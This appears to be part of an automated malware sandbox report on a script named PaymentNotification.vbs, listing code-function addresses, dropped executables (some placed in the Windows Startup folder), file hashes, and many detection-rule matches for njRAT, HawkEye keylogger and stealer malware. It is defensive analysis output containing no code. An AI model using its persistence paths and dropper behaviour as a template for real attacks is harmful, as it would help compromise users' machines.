Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F4F298
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F48918
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008AD426
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008BD5AE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008AD523
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008B7646
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008E29BE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008E6AF4
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0090ABFC
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903CBE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903C4D
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903DC0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008AED03
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903D2F
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008ACF92
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008BAFA6
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102639C
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C96048
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C95758
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C97C30
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C97089
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C97098
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C91D9A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C91DA8
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008DC7BC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404F4E

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Tmp.exe 2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\pgr.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00411538 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: String function: 008EBA9D appears 35 times

Source: PaymentNotification.vbs

Initial sample: Strings found which are bigger than 50

Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
